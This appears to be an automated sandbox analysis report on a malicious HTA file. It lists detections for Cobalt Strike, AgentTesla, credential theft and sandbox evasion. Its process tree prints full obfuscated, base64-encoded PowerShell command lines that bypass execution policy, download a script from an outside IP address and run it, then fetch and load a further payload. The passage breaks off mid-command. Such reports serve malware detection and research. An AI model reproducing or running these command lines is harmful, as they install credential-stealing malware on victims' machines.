Edit tour
Windows
Analysis Report
seethebestthingswithgreatsituationshandletotheprogress.hta
Overview
General Information
Detection
Cobalt Strike, AgentTesla, HTMLPhisher
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected HtmlPhish44
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 1780 cmdline:
mshta.exe "C:\Users\ user\Deskt op\seetheb estthingsw ithgreatsi tuationsha ndletothep rogress.ht a" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 4176 cmdline:
"C:\Window s\sYSteM32 \WInDowspo WeRShelL\V 1.0\POWeRS HElL.EXe" "PoWERsHel L.Exe -EX bYPAsS -noP -W 1 -c DEvIceCr EdenTialdE PLoyment.E xe ; INV oKe-ExPReS SIOn($(InV OkE-exPReS SIon('[sYS tEM.Text.E NcODInG]'+ [CHAR]58+[ CHar]58+'u tf8.GETstR Ing([sYstE M.CONVeRt] '+[ChAR]58 +[chaR]58+ 'FROMBAsE6 4sTRING('+ [CHaR]34+' JGsgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICA9IC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgYURkLXRZ cGUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAtTW VtQmVyREVG aW5JVGlvbi AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICdbRGxs SW1wb3J0KC J1cmxtT04i LCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIENoYX JTZXQgPSBD aGFyU2V0Ll VuaWNvZGUp XXB1YmxpYy BzdGF0aWMg ZXh0ZXJuIE ludFB0ciBV UkxEb3dubG 9hZFRvRmls ZShJbnRQdH IgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBkQ2Jw Y2N4dVFRbS xzdHJpbmcg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICBJek1tLH N0cmluZyAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IFppdmRUcF YsdWludCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IGZVeUZIc2 dOZSxJbnRQ dHIgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBrVU 96SGNmbHp5 KTsnICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLW 5hTUUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAi ZGZCIiAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC 1OYU1Fc1BB Q2UgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBIU2 Jmb1ZwbiAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IC1QYXNzVG hydTsgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAk azo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cDov LzE5Mi4zLj IyLjEzL3hh bXBwL3NlL3 NlZXRoZWJl c3R0aGluZ3 NlbnRpcmV0 aW1ld2l0aG dyZWF0dGhp bmdzd2l0aG xvdmVya2lz cy50SUYiLC IkRW5WOkFQ UERBVEFcc2 VldGhlYmVz dHRoaW5nc2 VudGlyZXRp bWV3aXRoZ3 JlYXR0aGlu Z3N3aXRobG 92ZXJraXMu dmJTIiwwLD ApO1NUYVJ0 LXNsZUVwKD MpO2lFeCAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICIkRU5WOk FQUERBVEFc c2VldGhlYm VzdHRoaW5n c2VudGlyZX RpbWV3aXRo Z3JlYXR0aG luZ3N3aXRo bG92ZXJraX MudmJTIg== '+[cHaR]0x 22+'))'))) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6212 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5052 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -EX bYPAsS -noP -W 1 -c DEvIce CrEdenTial dEPLoyment .Exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 3496 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\ndpe2s1t \ndpe2s1t. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 1476 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S4D39.tmp" "c:\Users \user\AppD ata\Local\ Temp\ndpe2 s1t\CSCD8B AC46370384 FA881732B4 F85FC96.TM P" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 1136 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth ebestthing sentiretim ewithgreat thingswith loverkis.v bS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 4616 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdEcDNpbW FnZVVybCA9 IEYxbWh0dH BzOi8vMTAx Ny5maWxlbW FpbC5jb20v YXBpL2ZpbG UvZ2V0P2Zp bGVrZXk9Mi crJ0FhX2JX bzlSZXU0NX Q3QlUxa1Zn c2Q5cFQ5cG dTU2x2U3RH cm5USUNmRm gnKydtVEtq M0xDNlNRdE ljT2NfVDM1 dyZwa192aW Q9ZmQ0ZjYx NGJiMjA5Yz YyYzE3MzA5 NDUxNzZhMD kwNGYgRjFt O0RwM3dlJy snYkNsaWVu dCA9IE5ldy 1PYmplY3Qg U3lzdGVtLk 5ldC5XZWJD bGllbnQ7RH AzaW1hZ2VC eXRlcyA9IE RwM3dlYkNs aWVudCcrJy 5Eb3cnKydu bG9hZERhdG EoRHAzaW1h ZycrJ2VVci crJ2wpO0Rw M2ltYWdlVG V4JysndCA9 IFtTeXN0ZW 0uVGV4dC5F bmNvZGluZ1 06OlVURjgu R2V0U3RyaW 5nKERwM2lt YWdlQnl0ZX MpO0RwM3N0 YXJ0RmxhZy A9IEYxbTwn Kyc8QkFTRT Y0X1NUQVJU Pj5GMW0nKy c7RHAzZW5k RmxhZyA9IE YxbTw8QkFT RTY0X0VORD 4+RjFtO0Rw M3N0YXJ0SS crJ25kZXgg PSBEcDNpbW FnZVRleHQu SW5kZXhPZi hEcDNzdGFy dEZsYWcpO0 RwM2VuZElu ZGUnKyd4ID 0gRHAzaW1h Z2VUZXh0Lk luZGV4T2Yo RHAzZW4nKy dkJysnRmxh Zyk7RHAzc3 RhcnRJbmRl eCAtJysnZ2 UgMCAtYW5k IERwM2VuZE luZGV4IC1n JysndCBEcD NzdGFydElu ZGV4O0RwM3 N0YXJ0SW5k ZXggKz0gRH Azc3RhcnQn KydGJysnbG FnLkxlbmd0 aDtEcDNiYX NlNjRMZW5n dGggPSBEcD NlbmRJbmRl eCAtIERwM3 N0YXJ0SW5k ZXg7RHAzYm FzJysnZTY0 Q29tbWFuZC A9IERwM2lt YWdlVGV4dC 5TdWJzdHJp bmcoRHAzc3 RhcnRJbmRl eCwgRHAzYm FzZTY0TGVu Z3RoKTtEcD NiYXNlNjRS ZXZlcicrJ3 NlZCA9IC1q b2luIChEcD NiYXNlNjRD b21tYW5kLl RvQ2gnKydh ckFyJysncm F5KCkgNTl0 IEZvckVhY2 gtT2JqZWN0 IHsgRHAzXy B9KVstMS4u LScrJyhEcD NiYXNlNjRD b21tYScrJ2 5kLkxlbmd0 aCldO0RwM2 NvbW1hbmRC eXRlcyA9IF tTeXN0ZW0u Q29udmVydF 06OkZyb21C YXNlNjRTdH JpbicrJ2co JysnRHAzYi crJ2FzZTY0 UmV2ZXJzZW QpO0RwM2xv YWQnKydlZE Fzc2VtYmx5 ID0gW1N5c3 RlbS5SZWZs ZScrJ2N0aW 9uLkFzc2Vt Ymx5XScrJz o6TG9hZChE cDNjb21tYW 5kQnl0ZXMp O0RwM3ZhaU 1ldGhvZCcr JyA9JysnIF tkJysnbmxp Yi5JTy5Ib2 1lXS5HZXRN ZXRob2QoRj FtVkFJRjFt KTtEcDN2YW lNZXRob2Qu SW52bycrJ2 tlKERwM251 bGwsIEAoRj FtdHh0LkZS RkZSVy8yNT MvMzEuMjIu My4yOTEvLz pwdHRoRjFt LCBGMW1kZX NhdGl2YWRv RjFtLCBGJy snMW1kZXNh dGl2YWRvRj FtLCBGMW1k ZXNhdGl2YW RvRjFtLCBG MW1BZGRJbl AnKydyb2Nl c3MzJysnMk YxbSwgRjFt ZGVzYXRpdm Fkb0YxbSwg RjFtZGVzYX RpdmFkb0Yx bSxGMW1kZX NhdGl2YWRv RjFtLEYxbW Rlc2F0aXZh ZG9GMScrJ2 0sRjFtJysn ZGVzYXRpdm Fkb0YxbSxG MW1kZXNhdG l2YWRvRjFt LCcrJ0YxbW Rlc2F0aXZh ZG9GMW0sRj FtMUYxbSxG MW1kZXNhdG l2YWRvRjFt KSk7JykuUk VwbGFjZSgo W2NoYVJdNz ArW2NoYVJd NDkrW2NoYV JdMTA5KSxb c1RSSU5nXV tjaGFSXTM5 KS5SRXBsYW NlKChbY2hh Ul02OCtbY2 hhUl0xMTIr W2NoYVJdNT EpLCckJyku UkVwbGFjZS goW2NoYVJd NTMrW2NoYV JdNTcrW2No YVJdMTE2KS xbc1RSSU5n XVtjaGFSXT EyNCl8IC4o KEdldC1WQV JJYWJMRSAn Km1kcionKS 5OYW1lWzMs MTEsMl0tSm 9pTicnKQ== ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by